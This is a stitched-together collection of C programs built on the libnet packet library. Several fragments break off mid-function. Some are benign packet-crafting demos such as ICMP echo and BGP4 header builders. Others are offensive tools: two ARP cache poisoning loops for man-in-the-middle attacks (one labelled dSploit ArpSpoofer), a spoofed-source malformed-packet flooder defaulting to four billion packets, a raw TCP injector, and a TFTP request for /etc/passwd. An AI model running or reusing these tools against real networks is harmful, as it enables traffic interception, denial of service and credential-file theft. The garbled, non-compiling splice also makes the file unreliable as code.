libnet_get_prand(LIBNET_PRu32),
libnet_get_prand(LIBNET_PRu32),
0x18, /* (PSH, ACK) */
libnet_get_prand(LIBNET_PRu16), /* window size */
0, /* checksum */
0, /* urgent pointer */
LIBNET_TCP_H + pay_s, /* packet length */
dms, /* payload */
pay_s, /* payload size */
l, /* libnet handle */
tcp); /* libnet id */
if (tcp == -1) {
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Building IP */
ip = libnet_build_ipv4(
LIBNET_IPV4_H + pay_s + LIBNET_TCP_H, /* length */
0x00, /* TOS */
0, /* IP ID */
0x4000, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip,
dst_ip,
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
ip); /* libnet id */
if (ip == -1) {
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/* Write it to the wire. */
c = libnet_write(l);
if (c == -1) {
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
} else {
/* printf("Wrote %d byte TCP packet; check the wire.\n", c); */
}
/* usleep(20); slow down to conserve bandwidth */
libnet_stats(l, &ls);
fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int main() {
libnet_t *l; /* libnet context */
char errbuf[LIBNET_ERRBUF_SIZE], ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id, seq;
int i;
l = libnet_init(LIBNET_RAW4, NULL, errbuf);
if ( l == NULL ) {
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
/* Generating a random id */
libnet_seed_prand(l);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
/* Getting destination IP address */
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(l, ip_addr_str, LIBNET_DONT_RESOLVE);
if ( ip_addr == -1 ) {
fprintf(stderr, "Error converting IP address.\n");
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Writing 4 packets */
seq = 1;
for ( i = 0; i < 4; i++ ) {
/* Building the ICMP header */
if ( libnet_build_icmpv4_echo(ICMP_ECHO, 0, 0, id,\
(seq + i), NULL, 0, l, 0) == -1 ) {
fprintf(stderr, "Error building ICMP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
/* Building the IP header */
if ( libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H, IPPROTO_ICMP,\
ip_addr, l) == -1 ) {
fprintf(stderr, "Error building IP header: %s\n",\
libnet_geterror(l));
libnet_destroy(l);
exit(EXIT_FAILURE);
}
if ( libnet_write(l) == -1 )
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(l));
/* Clearing the packet */
/* Comment this to see what happens when you rebuild headers
* without calling libnet_clear_packet() */
libnet_clear_packet(l);
/* Waiting 1 second between each packet */
sleep(1);
}
libnet_destroy(l);
return 0;
}
int main()
{
libnet_t *handle;
char errbuf[LIBNET_ERRBUF_SIZE],ip_addr_str[16];
u_int32_t ip_addr;
u_int16_t id,seq;
char payload[] = "libnet :D";
int bytes_written;
handle = libnet_init(LIBNET_RAW4,NULL,errbuf);
if(handle == NULL)
{
fprintf(stderr,"libnet_init() failed: %s\n",errbuf);
exit(EXIT_FAILURE);
}
libnet_seed_prand(handle);
id = (u_int16_t)libnet_get_prand(LIBNET_PR16);
printf("Destination IP address: ");
scanf("%15s",ip_addr_str);
ip_addr = libnet_name2addr4(handle,ip_addr_str,LIBNET_DONT_RESOLVE);
if(ip_addr == -1)
{
fprintf(stderr,"Error converting IP address.\n");
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
seq = 1;
if(libnet_build_icmpv4_echo(ICMP_ECHO,0,0,id,seq,\
(u_int8_t *)payload,sizeof(payload),handle,0)==-1)
{
fprintf(stderr,"Error building ICMP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
if(libnet_autobuild_ipv4(LIBNET_IPV4_H + \
LIBNET_ICMPV4_ECHO_H + sizeof(payload),\
IPPROTO_ICMP,ip_addr,handle) == -1)
{
fprintf(stderr,"Error building IP header: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
exit(EXIT_FAILURE);
}
bytes_written = libnet_write(handle);
if(bytes_written != -1)
printf("%d bytes written.\n",bytes_written);
else
fprintf(stderr,"Error writing packet: %s\n",\
libnet_geterror(handle));
libnet_destroy(handle);
return 0;
}
int
main(int argc, char **argv)
{
int c;
u_char *buf = NULL;
u_short *payload = NULL;
u_int payload_s = 0;
int packet_len = 0;
struct ip *ip_hdr = NULL;
struct udphdr *udp = NULL;
u_short *ip_opts = NULL;
/* libnet variables */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *l;
char *device = NULL;
/* Packet Variables */
u_int32_t src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
u_int32_t src_ip_b = 0, src_ip_e = 0,dst_ip_b = 0, dst_ip_e = 0;
u_int32_t src_len = 0,dst_len = 0;
u_char tos, ttl, ver;
u_int id, frag_off;
u_int ipopt_len;
/* Functionality Variables */
int src_ip_rand = 0, dst_ip_rand = 0;
struct timeval tv, tv2;
float sec;
unsigned int cx = 0;
u_long max_pushed = 10240; /* 10MB/sec */
u_long num_to_send = 0xffffffff; /* Send 4billion packets */
u_long skip = 0; /* Skip how many packets */
int printout = 0; /* Debugging */
int dst_port_rand = 0;
int src_port_rand = 0;
char *tmp_port = NULL;
u_int repeat = 1;
/* Defaults */
float FragPct = 10;
float BadIPVer = 10;
float IPOpts = 10;
float UDPCksm = 10;
/* Not crypto strong randomness but we don't really care. And this *
* gives us a way to determine the seed while the program is running *
* if we need to repeat the results */
seed = getpid();
/* Initialize libnet context, Root priviledges are required.*/
l = libnet_init(
LIBNET_RAW4_ADV, /* injection type */
device, /* network interface */
errbuf); /* error buffer */
if (l == NULL) {
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit( -1 );
}
while((c = getopt(argc, argv, "hd:s:a:b:y:z:r:m:k:Dp:V:F:I:U:vx:l:")) != EOF) {
switch (c) {
case 'h':
usage(argv[0]);
exit(0);
break;
case 'd':
dst_port_rand = 1;
if ( (tmp_port = index(optarg, ',')) != NULL ) {
*tmp_port++ = '\0';
dst_port_rand = 0;
dst_prt = htons((u_int) atol(tmp_port));
}
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random dest IP's\n");
dst_ip = 1; /* Just to pass sanity checks */
dst_ip_rand = 1;
break;
}
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
fprintf(stderr, "Bad dest IP\n");
exit( -1 );
}
break;
case 'a':
if ((src_ip_b = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
fprintf(stderr, "Bad source begain IP\n");
exit( -1 );
}
break;
case 'b':
if ((dst_ip_b = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
fprintf(stderr, "Bad source begain IP\n");
exit( -1 );
}
break;
case 'y':
if ((src_ip_e = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
fprintf(stderr, "Bad source begain IP\n");
exit( -1 );
}
break;
case 'z':
if ((dst_ip_e = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
fprintf(stderr, "Bad source begain IP\n");
exit( -1 );
}
break;
case 's':
src_port_rand = 1;
if ( (tmp_port = index(optarg, ',')) != NULL ) {
*tmp_port++ = '\0';
src_port_rand = 0;
src_prt = htons((u_int) atol(tmp_port));
}
if ( strcmp(optarg, "rand") == 0 ) {
printf("Using random source IP's\n");
src_ip = 1; /* Just to pass sanity checks */
src_ip_rand = 1;
break;
}
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == (u_int32_t)-1) {
fprintf(stderr, "Bad source IP\n");
exit( -1 );
}
break;
case 'r':
seed = atoi(optarg);
break;
case 'm':
max_pushed = atol(optarg);
break;
case 'k':
skip = atol(optarg);
printf("Will not transmit first %li packets.\n", skip);
break;
case 'D':
printout++;
break;
case 'p':
num_to_send = atoi(optarg);
break;
case 'V':
BadIPVer = atof(optarg);
break;
case 'F':
FragPct = atof(optarg);
break;
case 'I':
IPOpts = atof(optarg);
break;
case 'U':
UDPCksm = atof(optarg);
break;
case 'x':
repeat = atoi(optarg);
break;
case 'l':
payload_s = atoi(optarg);
break;
case 'v':
printf("Version %s\n", VERSION);
exit(0);
}
}
if(src_ip_b && src_ip_e)
{
if(htonl(src_ip_e) > htonl(src_ip_b))
{
src_len = htonl(src_ip_e) - htonl(src_ip_b);
}
else
{
src_len = htonl(src_ip_b) - htonl(src_ip_e);
}
}
if(dst_ip_b && dst_ip_e)
{
if(htonl(dst_ip_e) > htonl(dst_ip_b))
dst_len = htonl(dst_ip_e) - htonl(dst_ip_b);
else
dst_len = htonl(dst_ip_b) - htonl(dst_ip_e);
}
if ( !src_ip || !dst_ip ) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
printf("Compiled against Libnet %s\n", LIBNET_VERSION);
printf("Installing Signal Handlers.\n");
if ( signal(SIGTERM, &sighandler) == SIG_ERR )
printf("Failed to install signal handler for SIGTERM\n");
if ( signal(SIGINT, &sighandler) == SIG_ERR )
printf("Failed to install signal handler for SIGINT\n");
if ( signal(SIGQUIT, &sighandler) == SIG_ERR )
printf("Failed to install signal handler for SIGQUIT\n");
printf("Seeding with %i\n", seed);
srand(seed);
max_pushed *= 1024;
if ( src_port_rand )
printf("Using random source ports.\n");
if ( dst_port_rand )
printf("Using random destination ports.\n");
if ( (buf = malloc(IP_MAXPACKET)) == NULL ) {
perror("malloc: ");
exit( -1 );
}
if ( max_pushed >= 10000000 )
printf("No Maximum traffic limiter\n");
else printf("Maximum traffic rate = %.2f k/s\n", max_pushed/1024.0 );
printf("Bad IP Version\t= %.0f%%\t\t", BadIPVer);
printf("IP Opts Pcnt\t= %.0f%%\n", IPOpts);
printf("Frag'd Pcnt\t= %.0f%%\t\t", FragPct);
printf("Bad UDP Cksm\t= %.0f%%\n", UDPCksm);
printf("\n");
/* Drop them down to floats so we can multiply and not overflow */
BadIPVer /= 100;
FragPct /= 100;
IPOpts /= 100;
UDPCksm /= 100;
/*************
* Main Loop *
*************/
gettimeofday(&tv, NULL);
gettimeofday(&starttime, NULL);
for(acx = 0; acx < num_to_send; acx++) {
packet_len = IP_H + UDP_H;
tos = RAND8;
id = acx & 0xffff;
ttl = RAND8;
if ( rand() <= (RAND_MAX * FragPct) )
frag_off = RAND16;
else frag_off = 0;
/* We're not going to pad IP Options */
if ( rand() <= (RAND_MAX * IPOpts) ) {
ipopt_len = 10 * (rand() / (float) RAND_MAX);
ipopt_len = ipopt_len << 1;
ip_opts = (u_short *) buf;
packet_len += ipopt_len << 1;
for ( cx = 0; cx < ipopt_len; cx++ )
ip_opts[cx] = RAND16;
udp = (struct udphdr *) (buf + IP_H + (ipopt_len << 1));
ipopt_len = ipopt_len >> 1;
} else {
int main(int argc, char *argv[]) {
if(argc < 5) {
printf("Usage: ./out device local_port remote_addr remote_port\n");
return -1;
}
char *interface = argv[1];
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip_tag = 0, tcp_tag = 0;
u_short proto = IPPROTO_TCP;
int packet_size;
libnet_t *libnet_handler = libnet_init(LIBNET_RAW4_ADV, interface, errbuf);
if(NULL == libnet_handler) {
printf("libnet init failed: %s\n", errbuf);
exit(1);
}
u_long dst_ip = libnet_name2addr4(libnet_handler, argv[3], LIBNET_RESOLVE);
u_long src_ip = libnet_name2addr4(libnet_handler, "0.0.0.0", LIBNET_RESOLVE);
fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
struct sockaddr_in addr;
socklen_t slen = sizeof(addr);
memset((void *)&addr, 0, slen);
addr.sin_family = AF_INET;
addr.sin_port = htons(atoi(argv[2]));
inet_aton("0.0.0.0", &addr.sin_addr);
bind(fd, (const struct sockaddr*)&addr, slen);
u_char buf[BUF_SIZE];
ssize_t recvlen;
while(1) {
recvlen = recvfrom(fd, buf, BUF_SIZE, 0, NULL, NULL);
tcp_tag = libnet_build_tcp(
atoi(argv[2]), /* 源端口 */
atoi(argv[4]), /* 目的端口 */
8888, /* 序列号 */
8889, /* 确认号 */
TH_PUSH | TH_ACK, /* Control flags */
14600, /* 窗口尺寸 */
0, /* 校验和,0为自动计算 */
0, /* 紧急指针 */
LIBNET_TCP_H + recvlen, /* 长度 */
buf, /* 负载内容 */
recvlen, /* 负载内容长度 */
libnet_handler, /* libnet句柄 */
tcp_tag /* 新建包 */
);
if (tcp_tag == -1) {
printf("libnet_build_tcp failure\n");
continue;
};
/* 构造IP协议块,返回值是新生成的IP协议快的一个标记 */
ip_tag = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_TCP_H + recvlen, /* IP协议块的总长,*/
0, /* tos */
(u_short) libnet_get_prand(LIBNET_PRu16), /* id,随机产生0~65535 */
0, /* frag 片偏移 */
(u_int8_t)libnet_get_prand(LIBNET_PR8), /* ttl,随机产生0~255 */
proto, /* 上层协议 */
0, /* 校验和,此时为0,表示由Libnet自动计算 */
src_ip, /* 源IP地址,网络序 */
dst_ip, /* 目标IP地址,网络序 */
NULL, /* 负载内容或为NULL */
0, /* 负载内容的大小*/
libnet_handler, /* Libnet句柄 */
ip_tag /* 协议块标记可修改或创建,0表示构造一个新的*/
);
if (ip_tag == -1) {
printf("libnet_build_ipv4 failure\n");
return (-4);
};
packet_size = libnet_write(libnet_handler);
//libnet_clear_packet(libnet_handler);
}
libnet_destroy(libnet_handler);
}
int main(int argc, char *argv[])
{
int c;
libnet_t *l;
char *device = "eth0";
char *dst = NULL;
char src[HOST_NAME_MAX+1];
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t ip_ptag = 0;
char *cur_host;
int valid;
u_char payload[255] = {0x11, 0x11, 0x22, 0x22, 0x00, 0x08, 0xc6, 0xa5};
u_long payload_s = 8;
int i;
while ((c = getopt(argc, argv, "d:i:h")) != EOF)
{
switch (c)
{
case 'd':
dst = optarg;
break;
case 'i':
device = optarg;
break;
case 'h':
usage(argv[0]);
exit(EXIT_SUCCESS);
default:
exit(EXIT_FAILURE);
}
}
if (!dst) {
usage(argv[0]);
exit(EXIT_FAILURE);
}
gethostname(src, HOST_NAME_MAX);
cur_host = valid_hosts[0];
for (i=0, valid=0; cur_host; i++) {
if (strstr(cur_host, src)) {
valid = 1;
break;
}
cur_host = valid_hosts[i];
}
if (!valid) {
fprintf(stderr, "Uh uh. I don't think so.\n");
exit(EXIT_FAILURE);
}
l = libnet_init(
LIBNET_RAW4, /* injection type */
device, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
if ((dst_ip = libnet_name2addr4(l, dst, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", dst);
exit(EXIT_FAILURE);
}
if ((src_ip = libnet_name2addr4(l, src, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", src);
exit(EXIT_FAILURE);
}
ip_ptag = libnet_build_ipv4(
LIBNET_IPV4_H + payload_s, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_RESTART, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
ip_ptag); /* libnet id */
if (ip_ptag == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Sent restart packet to %s.\n", dst);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip;
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_ptag_t udp = 0, ip = 0;
char *filename = "/etc/passwd";
char mode[] = "netascii";
u_char *payload = NULL;
u_int payload_s = 0;
printf("libnet 1.1 packet shaping: UDP + payload[raw] == TFTP\n");
/*
* Initialize the library. Root priviledges are required.
*/
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
while ((c = getopt(argc, argv, "d:s:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
goto bad;
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
goto bad;
}
break;
case 'p':
filename = optarg;
break;
default:
fprintf(stderr, "unkown option [%s]: bye bye\n", optarg);
goto bad;
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
/*
* build payload
*
* 2 bytes string 1 byte string 1 byte
* ------------------------------------------------
* | Opcode | Filename | 0 | Mode | 0 |
* ------------------------------------------------
*
*/
payload_s = 2 + strlen(filename) + 1 + strlen(mode) + 1;
payload = malloc(sizeof(char)*payload_s);
if (!payload)
{
fprintf(stderr, "malloc error for payload\n");
goto bad;
}
memset(payload, 0, payload_s);
payload[1] = 1; /* opcode - GET */
memcpy(payload + 2, filename, strlen(filename));
memcpy(payload + 2 + strlen(filename) + 1 , mode, strlen(mode));
/*
* Build pblocks
*/
udp = libnet_build_udp(
0x1234, /* source port */
69, /* destination port */
LIBNET_UDP_H + payload_s, /* packet length */
0, /* checksum */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (udp == -1)
{
fprintf(stderr, "Can't build UDP header: %s\n", libnet_geterror(l));
goto bad;
}
ip = libnet_build_ipv4(
LIBNET_IPV4_H + LIBNET_UDP_H + payload_s, /* length - dont forget the UDP's payload */
0, /* TOS */
0x4242, /* IP ID */
0, /* IP Frag */
0x42, /* TTL */
IPPROTO_UDP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload (already in UDP) */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (ip == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TFTP packet; check the wire.\n", c);
}
libnet_destroy(l);
free(payload);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
free(payload);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
int c;
libnet_t *l;
u_long src_ip, dst_ip, length;
libnet_ptag_t t = 0;
char errbuf[LIBNET_ERRBUF_SIZE];
u_char *payload = NULL;
u_long payload_s = 0;
u_char marker[LIBNET_BGP4_MARKER_SIZE];
u_char type;
printf("libnet 1.1 packet shaping: BGP4 hdr + payload[raw]\n");
l = libnet_init(
LIBNET_RAW4, /* injection type */
NULL, /* network interface */
errbuf); /* error buffer */
if (l == NULL)
{
fprintf(stderr, "libnet_init() failed: %s", errbuf);
exit(EXIT_FAILURE);
}
src_ip = 0;
dst_ip = 0;
memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);
type = 0;
while ((c = getopt(argc, argv, "d:s:t:m:p:")) != EOF)
{
switch (c)
{
/*
* We expect the input to be of the form `ip.ip.ip.ip.port`. We
* point cp to the last dot of the IP address/port string and
* then seperate them with a NULL byte. The optarg now points to
* just the IP address, and cp points to the port.
*/
case 'd':
if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad destination IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 's':
if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)
{
fprintf(stderr, "Bad source IP address: %s\n", optarg);
exit(EXIT_FAILURE);
}
break;
case 'm':
memcpy(marker, optarg, LIBNET_BGP4_MARKER_SIZE);
break;
case 't':
type = atoi(optarg);
break;
case 'p':
payload = (u_char *)optarg;
payload_s = strlen((char *)optarg);
break;
default:
exit(EXIT_FAILURE);
}
}
if (!src_ip || !dst_ip)
{
usage(argv[0]);
exit(EXIT_FAILURE);
}
length = LIBNET_BGP4_HEADER_H + payload_s;
t = libnet_build_bgp4_header(
marker, /* marker */
length, /* length */
type, /* message type */
payload, /* payload */
payload_s, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_TCP_H;
t = libnet_build_tcp(
0x6666, /* source port */
179, /* destination port */
0x01010101, /* sequence number */
0x02020202, /* acknowledgement num */
TH_SYN, /* control flags */
32767, /* window size */
0, /* checksum */
0, /* urgent pointer */
length, /* TCP packet size */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));
goto bad;
}
length+=LIBNET_IPV4_H;
t = libnet_build_ipv4(
length, /* length */
0, /* TOS */
242, /* IP ID */
0, /* IP Frag */
64, /* TTL */
IPPROTO_TCP, /* protocol */
0, /* checksum */
src_ip, /* source IP */
dst_ip, /* destination IP */
NULL, /* payload */
0, /* payload size */
l, /* libnet handle */
0); /* libnet id */
if (t == -1)
{
fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));
goto bad;
}
/*
* Write it to the wire.
*/
c = libnet_write(l);
if (c == -1)
{
fprintf(stderr, "Write error: %s\n", libnet_geterror(l));
goto bad;
}
else
{
fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);
}
libnet_destroy(l);
return (EXIT_SUCCESS);
bad:
libnet_destroy(l);
return (EXIT_FAILURE);
}
int
main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
char pcap_ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
int c;
int n_scan_hosts = 0;
char *scan_prefix = NULL;
int scan_prefix_length = 32;
char *cleanup_src = NULL;
in_addr_t target_addr;
intf = NULL;
poison_reverse = 0;
poison_mesh = 0;
n_hosts = 0;
/* allocate enough memory for target list */
hosts = calloc( argc+1, sizeof(struct host) );
while ((c = getopt(argc, argv, "vrmi:s:t:c:h?V")) != -1) {
switch (c) {
case 'v':
verbose = 1;
break;
case 'i':
intf = optarg;
break;
case 't':
target_addr = libnet_name2addr4(l, optarg, LIBNET_RESOLVE);
if (target_addr == -1) {
usage();
} else {
host_add(target_addr, HOST_TARGET);
}
break;
case 'r':
poison_reverse = 1;
break;
case 'm':
poison_mesh = 1;
break;
case 's':
scan_prefix = strchr(optarg, '/');
if (scan_prefix) {
*scan_prefix = '\0';
scan_prefix_length = atoi(scan_prefix+1);
if (scan_prefix_length < 0 || scan_prefix_length > 32) {
usage();
}
}
n_scan_hosts += (1<<(32-scan_prefix_length));
/* we need some more memory to store the target data */
int mem = (argc+1 + n_scan_hosts) * sizeof(struct host);
hosts = realloc( hosts, mem );
hosts[n_hosts].ip = (uint32_t)0;
subnet_add(inet_addr(optarg), scan_prefix_length, HOST_TARGET);
break;
case 'c':
cleanup_src = optarg;
break;
default:
usage();
}
}
argc -= optind;
argv += optind;
if (!cleanup_src || strcmp(cleanup_src, "own")==0) { /* default! */
/* only use our own hw address when cleaning up,
* not jeopardizing any bridges on the way to our
* target
*/
cleanup_src_own = 1;
cleanup_src_host = 0;
} else if (strcmp(cleanup_src, "host")==0) {
/* only use the target hw address when cleaning up;
* this can screw up some bridges and scramble access
* for our own host, however it resets the arp table
* more reliably
*/
cleanup_src_own = 0;
cleanup_src_host = 1;
} else if (strcmp(cleanup_src, "both")==0) {
cleanup_src_own = 1;
cleanup_src_host = 1;
} else {
errx(1, "Invalid parameter to -c: use 'own' (default), 'host' or 'both'.");
usage();
}
while (argc--) {
if ((target_addr = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) {
errx(1, "Invalid address: %s", argv[0]);
usage();
}
host_add(target_addr, HOST_MODEL);
argv++;
}
if (poison_mesh) {
struct host *host = hosts;
for(;host->ip; host++) {
host->flags |= (HOST_TARGET|HOST_MODEL);
}
}
if (poison_reverse && active_targets() <= 0) {
errx(1, "Spoofing the reverse path (-r) is only available when specifying at least one target (-t/-s).");
usage();
}
if (intf == NULL && (intf = pcap_lookupdev(pcap_ebuf)) == NULL)
errx(1, "%s", pcap_ebuf);
if ((l = libnet_init(LIBNET_LINK, intf, libnet_ebuf)) == NULL)
errx(1, "%s", libnet_ebuf);
fprintf(stderr, "Scanning %d hw addresses...\n", n_hosts);
struct host *target = hosts;
for (; target->ip; target++) {
if (verbose) {
fprintf(stderr, "Looking up host %s...\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
}
int arp_status = arp_find(target->ip, &target->mac);
if (arp_status &&
/* just make sure we are not getting an empty or broadcast address */
(memcmp(&target->mac, zero_ha, sizeof(struct ether_addr)) != 0) &&
(memcmp(&target->mac, brd_ha, sizeof(struct ether_addr)) != 0)) {
target->flags |= HOST_ACTIVE;
if (target->flags & HOST_SUBNET) {
fprintf(stderr, "Found host in subnet %s: %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE), ether_ntoa((struct ether_addr *)&target->mac));
}
} else {
target->flags &= (~HOST_ACTIVE);
if (! (target->flags & HOST_SUBNET)) {
fprintf(stderr, "Unable to find specified host %s\n", libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
}
if (poison_reverse && target->flags & HOST_MODEL) {
errx(1, "couldn't arp for spoof host %s",
libnet_addr2name4(target->ip, LIBNET_DONT_RESOLVE));
usage();
}
}
}
if ((my_ha = (u_int8_t *)libnet_get_hwaddr(l)) == NULL) {
errx(1, "Unable to determine own mac address");
}
if (active_targets() == 0) {
errx(1, "No target hosts found.");
}
signal(SIGHUP, cleanup);
signal(SIGINT, cleanup);
signal(SIGTERM, cleanup);
fprintf(stderr, "Starting spoofing process...\n");
for (;;) {
struct host *target = hosts;
for(;target->ip; target++) {
if (!(target->flags & HOST_TARGET)) continue;
if (!(target->flags & HOST_ACTIVE)) continue;
struct host *model = hosts;
for (;model->ip; model++) {
if (!(model->flags & HOST_ACTIVE)) continue;
if (!(model->flags & HOST_MODEL)) continue;
if (target->ip != model->ip) {
arp_send(l, ARPOP_REPLY, my_ha, model->ip,
(target->ip ? (u_int8_t *)&target->mac : brd_ha),
target->ip,
my_ha);
usleep(ARP_PAUSE);
if (poison_reverse) {
arp_send(l, ARPOP_REPLY, my_ha, target->ip, (uint8_t *)&model->mac, model->ip, my_ha);
usleep(ARP_PAUSE);
}
}
}
}
sleep(2);
}
/* NOTREACHED */
exit(0);
}
int main(int argc, char *argv[])
{
extern char *optarg;
extern int optind;
char pcap_ebuf[PCAP_ERRBUF_SIZE];
char libnet_ebuf[LIBNET_ERRBUF_SIZE];
int c,
netmask = 0,
ifaddr = 0,
nhosts = 0,
i = 0;
network_entry_t *entry;
iface = NULL;
gateway_ip = target_ip = 0;
printf( "dSploit ArpSpoofer.\n\n" );
while( (c = getopt(argc, argv, "i:t:h?V")) != -1)
{
switch (c)
{
case 'i':
iface = optarg;
break;
case 't':
if ((target_ip = libnet_name2addr4(lnet, optarg, LIBNET_RESOLVE)) == -1)
exit(1);
break;
default:
return 1;
}
}
argc -= optind;
argv += optind;
if (argc != 1)
return 1;
if( ( gateway_ip = libnet_name2addr4( lnet, argv[0], LIBNET_RESOLVE ) ) == -1 )
{
printf( "[ERROR] Unable to resolve gateway ip.\n" );
return 1;
}
if( iface == NULL && (iface = pcap_lookupdev(pcap_ebuf)) == NULL )
{
printf( "[ERROR] Unable to lookup network interface ( %s ).\n", pcap_ebuf );
return 1;
}
if( ( lnet = libnet_init(LIBNET_LINK, iface, libnet_ebuf) ) == NULL )
{
printf( "[ERROR] Unable to initialize libnet ( %s ).\n", libnet_ebuf );
return 1;
}
signal( SIGHUP, cleanup );
signal( SIGINT, cleanup );
signal( SIGTERM, cleanup );
our_mac = ( struct ether_addr * )libnet_get_hwaddr( lnet );
if( our_mac == NULL )
{
printf( "[ERROR] Unable to retrieve local hardware address libnet ( %s ).\n", libnet_geterror( lnet ) );
return 1;
}
if( net_get_details( iface, &netmask, &ifaddr, &nhosts ) != 0 )
exit( 1 );
printf( "netmask = %s\n", inet_ntoa( *( struct in_addr *)&netmask ) );
printf( "ifaddr = %s\n", inet_ntoa( *( struct in_addr *)&ifaddr ) );
printf( "gateway = %s\n", inet_ntoa( *( struct in_addr *)&gateway_ip ) );
printf( "hosts = %d\n", nhosts );
// force the arp cache to be populated
net_wake( iface, nhosts, ifaddr, netmask, gateway_ip );
